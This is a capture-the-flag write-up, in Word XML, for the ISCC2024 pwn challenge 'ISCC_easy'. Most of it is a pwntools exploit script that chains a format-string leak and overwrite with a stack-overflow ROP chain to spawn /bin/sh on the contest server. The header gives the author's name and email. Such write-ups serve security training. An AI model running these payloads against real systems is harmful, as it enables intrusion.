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26390" w14:textId="608BA2E4" w:rsidR="00287AEB" w:rsidRDefault="00287AEB" w:rsidP="00287AEB">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">ISCC2024 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>WriteUp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="778FFCC7" w14:textId="682E36A1" w:rsidR="00287AEB" w:rsidRPr="00CC1018" w:rsidRDefault="00CC1018" w:rsidP="00287AEB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001B495D">
        <w:t>W</w:t>
      </w:r>
      <w:r w:rsidRPr="001B495D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>hooops</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001B495D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>+李卓航+</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>925798691@qq.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23327266" w14:textId="1B332360" w:rsidR="00287AEB" w:rsidRDefault="00644402" w:rsidP="00CC1018">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r w:rsidR="00287AEB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>wn-ISCC_easy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="725A860E" w14:textId="7A9BE26E" w:rsidR="00287AEB" w:rsidRDefault="00287AEB" w:rsidP="00CC1018">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>解题思路</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C7AEDDA" w14:textId="77777777" w:rsidR="00CC1018" w:rsidRDefault="00287AEB" w:rsidP="00287AEB">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>格式字符串漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78E16864" w14:textId="21BC3646" w:rsidR="00287AEB" w:rsidRDefault="00287AEB" w:rsidP="00287AEB">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>泄露地址并且修改x为5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="643F4ECF" w14:textId="2303968B" w:rsidR="00287AEB" w:rsidRDefault="00287AEB" w:rsidP="00287AEB"/>
    <w:p w14:paraId="68EA2E8D" w14:textId="77777777" w:rsidR="00287AEB" w:rsidRDefault="00287AEB" w:rsidP="00287AEB"/>
    <w:p w14:paraId="3318A937" w14:textId="77777777" w:rsidR="00EC79CA" w:rsidRDefault="00287AEB" w:rsidP="00287AEB">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>之后welcome函数里面有栈溢出</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1846BB6F" w14:textId="47FB040B" w:rsidR="00287AEB" w:rsidRDefault="00287AEB" w:rsidP="00287AEB">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>运行system(</w:t>
      </w:r>
      <w:r>
        <w:t>“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  <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EBB1F1C" w14:textId="0CE47EF9" w:rsidR="00287AEB" w:rsidRDefault="00CC1018" w:rsidP="00287AEB">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7D1BEB52" wp14:editId="331FAEFD">
            <wp:extent cx="2171812" cy="1003352"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="1692652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52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7C7E9" wp14:editId="3AED0AFD">
            <wp:extent cx="2730640" cy="1079555"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="592093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93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B168" w14:textId="77777777" w:rsidR="00287AEB" w:rsidRPr="00287AEB" w:rsidRDefault="00287AEB" w:rsidP="00287AEB"/>
    <w:p w14:paraId="4E2D5278" w14:textId="0A0E1530" w:rsidR="00287AEB" w:rsidRDefault="00287AEB" w:rsidP="00CC1018">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Exp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FA361A7" w14:textId="77777777" w:rsidR="00F15A46" w:rsidRDefault="00F15A46" w:rsidP="00F15A46">
      <w:r>
        <w:t># 禁用地址空间布局随机化 (ASLR) 以便于调试</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69E6419F" w14:textId="77777777" w:rsidR="00F15A46" w:rsidRDefault="00F15A46" w:rsidP="00F15A46"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-w </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>kernel.randomize_va_space</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>=0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="417057A3" w14:textId="77777777" w:rsidR="00F15A46" w:rsidRDefault="00F15A46" w:rsidP="00F15A46"/>
    <w:p w14:paraId="0DDEF11E" w14:textId="77777777" w:rsidR="00F15A46" w:rsidRDefault="00F15A46" w:rsidP="00F15A46">
      <w:r>
        <w:t xml:space="preserve">from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pwn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> import *  # 导入</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pwntools</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>库，用于漏洞利用开发</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CD4CAC4" w14:textId="77777777" w:rsidR="00F15A46" w:rsidRDefault="00F15A46" w:rsidP="00F15A46">
      <w:r>
        <w:t xml:space="preserve">from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Crypto.Util.number</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> import </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>long_to_bytes</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>bytes_to_long</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">  # 导入Cryptography库中的实用函数</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A7383E4" w14:textId="77777777" w:rsidR="00F15A46" w:rsidRDefault="00F15A46" w:rsidP="00F15A46"/>
    <w:p w14:paraId="4C978EA1" w14:textId="77777777" w:rsidR="00F15A46" w:rsidRDefault="00F15A46" w:rsidP="00F15A46">
      <w:r>
        <w:t># 设置调试日志级别为 'debug'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D47974B" w14:textId="77777777" w:rsidR="00F15A46" w:rsidRDefault="00F15A46" w:rsidP="00F15A46">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>context.log_level</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = 'debug'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E840C28" w14:textId="77777777" w:rsidR="00F15A46" w:rsidRDefault="00F15A46" w:rsidP="00F15A46"/>
    <w:p w14:paraId="5AD35ABB" w14:textId="77777777" w:rsidR="00F15A46" w:rsidRDefault="00F15A46" w:rsidP="00F15A46">
      <w:r>
        <w:t># 设置二进制文件的体系结构和操作系统</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="794CB00A" w14:textId="77777777" w:rsidR="00F15A46" w:rsidRDefault="00F15A46" w:rsidP="00F15A46">
      <w:r>
        <w:t xml:space="preserve">context(arch='i386', </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>os</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>='</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E0A765B" w14:textId="77777777" w:rsidR="00F15A46" w:rsidRDefault="00F15A46" w:rsidP="00F15A46"/>
    <w:p w14:paraId="426B4B50" w14:textId="77777777" w:rsidR="00F15A46" w:rsidRDefault="00F15A46" w:rsidP="00F15A46">
      <w:r>
        <w:t xml:space="preserve"># 设置调试终端为 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tmux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 的水平分屏</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29351621" w14:textId="77777777" w:rsidR="00F15A46" w:rsidRDefault="00F15A46" w:rsidP="00F15A46">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>context.terminal</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = ['</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tmux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>', '</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>splitw</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>', '-h']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="749EB033" w14:textId="77777777" w:rsidR="00F15A46" w:rsidRDefault="00F15A46" w:rsidP="00F15A46"/>
    <w:p w14:paraId="06DA87EC" w14:textId="77777777" w:rsidR="00F15A46" w:rsidRDefault="00F15A46" w:rsidP="00F15A46">
      <w:r>
        <w:t># 目标程序的路径</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="089D11B9" w14:textId="77777777" w:rsidR="00F15A46" w:rsidRDefault="00F15A46" w:rsidP="00F15A46">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pwn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = './easy'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CBDA766" w14:textId="77777777" w:rsidR="00F15A46" w:rsidRDefault="00F15A46" w:rsidP="00F15A46"/>
    <w:p w14:paraId="62CBA894" w14:textId="77777777" w:rsidR="00F15A46" w:rsidRDefault="00F15A46" w:rsidP="00F15A46">
      <w:r>
        <w:t># 连接到远程服务</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A0F1C45" w14:textId="77777777" w:rsidR="00F15A46" w:rsidRDefault="00F15A46" w:rsidP="00F15A46">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>p = remote('182.92.237.102', 10013)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70BC491F" w14:textId="77777777" w:rsidR="00F15A46" w:rsidRDefault="00F15A46" w:rsidP="00F15A46"/>
    <w:p w14:paraId="024E2419" w14:textId="77777777" w:rsidR="00F15A46" w:rsidRDefault="00F15A46" w:rsidP="00F15A46">
      <w:r>
        <w:t># 也可以使用本地进程进行测试</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ACB940C" w14:textId="77777777" w:rsidR="00F15A46" w:rsidRDefault="00F15A46" w:rsidP="00F15A46">
      <w:r>
        <w:t xml:space="preserve"># p = process(['./ld-2.31.so', </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pwn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>], env={"LD_PRELOAD":'./libc-2.31.so'})</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EFB5658" w14:textId="77777777" w:rsidR="00F15A46" w:rsidRDefault="00F15A46" w:rsidP="00F15A46">
      <w:r>
        <w:t># p = process('./easy')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B2C5177" w14:textId="77777777" w:rsidR="00F15A46" w:rsidRDefault="00F15A46" w:rsidP="00F15A46"/>
    <w:p w14:paraId="7E3E152C" w14:textId="77777777" w:rsidR="00F15A46" w:rsidRDefault="00F15A46" w:rsidP="00F15A46">
      <w:r>
        <w:t># 启动调试器 (如果需要)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EBF3C1C" w14:textId="77777777" w:rsidR="00F15A46" w:rsidRDefault="00F15A46" w:rsidP="00F15A46">
      <w:r>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>gdb.attach</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(p)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7971D336" w14:textId="77777777" w:rsidR="00F15A46" w:rsidRDefault="00F15A46" w:rsidP="00F15A46"/>
    <w:p w14:paraId="1EC0C50A" w14:textId="77777777" w:rsidR="00F15A46" w:rsidRDefault="00F15A46" w:rsidP="00F15A46">
      <w:r>
        <w:t># 读取目标程序的ELF文件，便于获取符号信息</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6453E560" w14:textId="77777777" w:rsidR="00F15A46" w:rsidRDefault="00F15A46" w:rsidP="00F15A46">
      <w:r>
        <w:t># elf = ELF(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pwn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01937E6D" w14:textId="77777777" w:rsidR="00F15A46" w:rsidRDefault="00F15A46" w:rsidP="00F15A46">
      <w:r>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>libc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = ELF('./libc.so.6')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1265DA51" w14:textId="77777777" w:rsidR="00F15A46" w:rsidRDefault="00F15A46" w:rsidP="00F15A46"/>
    <w:p w14:paraId="68750A2D" w14:textId="77777777" w:rsidR="00F15A46" w:rsidRDefault="00F15A46" w:rsidP="00F15A46">
      <w:r>
        <w:t># 目标地址</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D1440E4" w14:textId="77777777" w:rsidR="00F15A46" w:rsidRDefault="00F15A46" w:rsidP="00F15A46">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>x_a</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = 0x804C030</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D0A5993" w14:textId="77777777" w:rsidR="00F15A46" w:rsidRDefault="00F15A46" w:rsidP="00F15A46"/>
    <w:p w14:paraId="511B21DC" w14:textId="77777777" w:rsidR="00F15A46" w:rsidRDefault="00F15A46" w:rsidP="00F15A46">
      <w:r>
        <w:t># 格式化字符串的偏移量</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18EEDD60" w14:textId="77777777" w:rsidR="00F15A46" w:rsidRDefault="00F15A46" w:rsidP="00F15A46">
      <w:r>
        <w:t>off = 4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EAF674C" w14:textId="77777777" w:rsidR="00F15A46" w:rsidRDefault="00F15A46" w:rsidP="00F15A46"/>
    <w:p w14:paraId="4A1A83A9" w14:textId="77777777" w:rsidR="00F15A46" w:rsidRDefault="00F15A46" w:rsidP="00F15A46">
      <w:r>
        <w:t># 创建格式化字符串攻击载荷</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7639B4F2" w14:textId="77777777" w:rsidR="00F15A46" w:rsidRDefault="00F15A46" w:rsidP="00F15A46">
      <w:r>
        <w:t>pl = b'%5c%9$n%15$p%12$paaa' + p32(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>x_a</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>) + b'/bin/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EDF9DDB" w14:textId="77777777" w:rsidR="00F15A46" w:rsidRDefault="00F15A46" w:rsidP="00F15A46">
      <w:r>
        <w:t>pay = b'</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>aaaa%p</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>.%</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>p.%p.%p.%p.%p.%p.%p.%p.%p.%p</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>.'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03B78A71" w14:textId="77777777" w:rsidR="00F15A46" w:rsidRDefault="00F15A46" w:rsidP="00F15A46">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>p.sendline</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(pl)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3346C726" w14:textId="77777777" w:rsidR="00F15A46" w:rsidRDefault="00F15A46" w:rsidP="00F15A46"/>
    <w:p w14:paraId="3D52DC30" w14:textId="77777777" w:rsidR="00F15A46" w:rsidRDefault="00F15A46" w:rsidP="00F15A46">
      <w:r>
        <w:t># 构造溢出载荷以覆盖返回地址</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ED6000B" w14:textId="77777777" w:rsidR="00F15A46" w:rsidRDefault="00F15A46" w:rsidP="00F15A46">
      <w:r>
        <w:t xml:space="preserve">pl = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>b'a</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>' * 0x94 + p32(0xc890b)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62CC8155" w14:textId="77777777" w:rsidR="00F15A46" w:rsidRDefault="00F15A46" w:rsidP="00F15A46"/>
    <w:p w14:paraId="5A8A83D4" w14:textId="77777777" w:rsidR="00F15A46" w:rsidRDefault="00F15A46" w:rsidP="00F15A46">
      <w:r>
        <w:t># 解析</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>libc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>基地址</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EF02FB7" w14:textId="77777777" w:rsidR="00F15A46" w:rsidRDefault="00F15A46" w:rsidP="00F15A46">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>p.recvuntil</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(b'0x')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F632ED6" w14:textId="77777777" w:rsidR="00F15A46" w:rsidRDefault="00F15A46" w:rsidP="00F15A46">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>libc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = int(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>p.recv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(8), 16)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B0899CB" w14:textId="77777777" w:rsidR="00F15A46" w:rsidRDefault="00F15A46" w:rsidP="00F15A46">
      <w:r>
        <w:t xml:space="preserve">base = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>libc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> - (0xf20ceed5 - 0xf20b4000)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6400B040" w14:textId="77777777" w:rsidR="00F15A46" w:rsidRDefault="00F15A46" w:rsidP="00F15A46"/>
    <w:p w14:paraId="0976673D" w14:textId="77777777" w:rsidR="00F15A46" w:rsidRDefault="00F15A46" w:rsidP="00F15A46">
      <w:r>
        <w:t># 解析栈地址</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E63366D" w14:textId="77777777" w:rsidR="00F15A46" w:rsidRDefault="00F15A46" w:rsidP="00F15A46">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>p.recvuntil</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(b'0x')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F2BADF7" w14:textId="77777777" w:rsidR="00F15A46" w:rsidRDefault="00F15A46" w:rsidP="00F15A46">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>stk</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = int(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>p.recv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(8), 16)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29BDC9AE" w14:textId="77777777" w:rsidR="00F15A46" w:rsidRDefault="00F15A46" w:rsidP="00F15A46">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>buf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>stk</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> - (0xffc685b0 - 0xffc68588)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70EECFBB" w14:textId="77777777" w:rsidR="00F15A46" w:rsidRDefault="00F15A46" w:rsidP="00F15A46"/>
    <w:p w14:paraId="14A429A1" w14:textId="77777777" w:rsidR="00F15A46" w:rsidRDefault="00F15A46" w:rsidP="00F15A46">
      <w:r>
        <w:t># 构造利用链</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78DDC027" w14:textId="77777777" w:rsidR="00F15A46" w:rsidRDefault="00F15A46" w:rsidP="00F15A46">
      <w:r>
        <w:t xml:space="preserve">pl = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>b'a</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>' * 0x94 + p32(base + 0x41360) + p32(0x08049399) + p32(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>buf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E21A0FC" w14:textId="77777777" w:rsidR="00F15A46" w:rsidRDefault="00F15A46" w:rsidP="00F15A46">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>p.sendline</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(pl)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B29D777" w14:textId="77777777" w:rsidR="00F15A46" w:rsidRDefault="00F15A46" w:rsidP="00F15A46"/>
    <w:p w14:paraId="2F3BA3B5" w14:textId="77777777" w:rsidR="00F15A46" w:rsidRDefault="00F15A46" w:rsidP="00F15A46">
      <w:r>
        <w:t># 进入交互模式以便与目标系统进行交互</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E04286E" w14:textId="77777777" w:rsidR="00F15A46" w:rsidRDefault="00F15A46" w:rsidP="00F15A46">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>p.interactive</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="208FB6FD" w14:textId="77777777" w:rsidR="00F15A46" w:rsidRDefault="00F15A46" w:rsidP="00F15A46"/>
    <w:p w14:paraId="446BD623" w14:textId="77777777" w:rsidR="00F15A46" w:rsidRDefault="00F15A46" w:rsidP="00F15A46">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t># 其他可用的ROP gadgets：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7802C877" w14:textId="77777777" w:rsidR="00F15A46" w:rsidRDefault="00F15A46" w:rsidP="00F15A46">
      <w:r>
        <w:t xml:space="preserve"># 0xc890b </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>execve</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>("/bin/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">", [ebp-0x2c], </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>esi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DD16F93" w14:textId="77777777" w:rsidR="00F15A46" w:rsidRDefault="00F15A46" w:rsidP="00F15A46">
      <w:r>
        <w:t># constraints:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06B21513" w14:textId="77777777" w:rsidR="00F15A46" w:rsidRDefault="00F15A46" w:rsidP="00F15A46">
      <w:r>
        <w:t>#   address ebp-0x20 is writable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78DF35FE" w14:textId="77777777" w:rsidR="00F15A46" w:rsidRDefault="00F15A46" w:rsidP="00F15A46">
      <w:r>
        <w:t xml:space="preserve">#   </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ebx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> is the GOT address of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>libc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2627450A" w14:textId="77777777" w:rsidR="00F15A46" w:rsidRDefault="00F15A46" w:rsidP="00F15A46">
      <w:r>
        <w:t xml:space="preserve">#   [[ebp-0x2c]] == NULL || [ebp-0x2c] == NULL || [ebp-0x2c] is a valid </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>argv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4B905C89" w14:textId="77777777" w:rsidR="00F15A46" w:rsidRDefault="00F15A46" w:rsidP="00F15A46">
      <w:r>
        <w:t>#   [</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>esi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">] == NULL || </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>esi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> == NULL || </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>esi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> is a valid </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>envp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7C3ACDAE" w14:textId="77777777" w:rsidR="00F15A46" w:rsidRDefault="00F15A46" w:rsidP="00F15A46"/>
